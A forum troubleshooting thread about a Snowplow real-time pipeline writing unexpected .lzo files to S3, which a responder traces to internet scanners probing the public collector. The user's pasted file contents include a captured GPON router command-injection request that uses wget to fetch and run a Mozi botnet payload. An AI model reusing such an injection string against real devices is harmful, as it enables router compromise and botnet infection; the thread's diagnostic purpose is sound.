I am setting up a real-time pipeline. While starting the collector and enrich services, or after a certain duration, I noticed that some dummy files are being written to the RAW and BAD folders of the S3 bucket:
s3://bucket-name/raw
s3://bucket-name/bad
Below are the versions of the applications I am using:
Collector : snowplow-stream-collector-kinesis-1.0.0.jar
Stream Enrich : snowplow-stream-enrich-kinesis-1.0.0.jar
Elastic Search Loader (Good and Bad) : snowplow-elasticsearch-loader-http-0.10.2.jar
S3 Sink (Good and Bad) : snowplow-s3-loader-0.6.0.jar
Let me know if I need to share the respective config.hocon file details.
Hi @sp_user, what do these dummy files look like? Can you give us examples of their filenames and extensions and whether there is anything in them? Are they written to the root of the bucket or to separate folders?
What about the good bucket? Are there any dummy files in there too?
These dummy files are .lzo files created in bucket/raw for good events and bucket/bad for bad events. In both cases the files are created at the same time in the respective buckets.
Below are the details of one such .lzo file from bucket/raw:
(binary LZO/Thrift data; the recoverable printable strings are:)
‰LZO
222.244.194.113
UTF-8
ssc-1.0.0-kinesis
Hello, World
/GponForm/diag_Form
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80
Timeout-Access:
Host: 127.0.0.1
Accept: */*
Accept-Encoding: gzip, deflate
user-agent: Hello, World
X-Forwarded-For: 222.244.194.113
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive
application/octet-stream
127.0.0.1
9dec2c39-e03e-44c1-8a45-90f22a159e5e
iglu:com.snowplowanalytics.snowplow/CollectorPayload/thrift/1-0-0
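For reference, the readable strings above can be pulled out of a downloaded file with standard tools; the filename here is just an example:

lzop -d part-0001.lzo    # decompress; the records inside are Thrift-serialized CollectorPayloads
strings part-0001        # print the human-readable string fields (path, headers, user agent)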
Note: currently no events are flowing to the collector via a tracker. Similarly, if I fire a dummy event using the curl command below, files are generated in the respective buckets at the same time.
curl -i "http://localhost:8080/i?"
Both of these look like legitimate failed events (adapter failures) from something sending data to the collector.
I’d recommend using the JavaScript tracker to test the endpoint, but if you use curl you’ll need to include some of the required parameters so the event doesn’t fail validation.
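For example, something like the following should pass initial validation, if I remember the Tracker Protocol minimums correctly: e is the event type (pv = page view), p the platform, and tv the tracker version; the url and aid values here are just placeholders.

curl -i "http://localhost:8080/i?e=pv&p=web&tv=curl-test&url=http%3A%2F%2Fexample.com&aid=test-app"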
Thanks Mike. I will use the mentioned curl approach for further manual testing.
But can you please help me with the initial question: why are some events being triggered automatically, with .lzo files generated under the respective folders in the S3 bucket, when no events are being pushed to the collector by either a tracker or a curl command?
I’m guessing that your collector is publicly available on the internet?
If so, your collector will be getting scanned by various bots/spiders that perform automated vulnerability scans. The adapter failures bad row type logs anything that does not conform to an expected Snowplow collector path, so in this case it’s logging traffic from a scanner that was trying to exploit the collector (here, a known CVE for a home router).
There’s not really a huge amount you can do about this, other than ignoring certain adapter failures or, alternatively, attempting to block certain traffic to your collector.
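As a rough sketch of the first option, assuming the self-describing bad row JSON format (where the failure type appears in the top-level schema URI), you could filter adapter failures out of the bad stream before indexing or archiving it, e.g. with jq; the input filename is hypothetical:

cat bad-rows.ndjson | jq -c 'select(.schema | contains("adapter_failures") | not)'   # drop adapter_failures rows, keep everything else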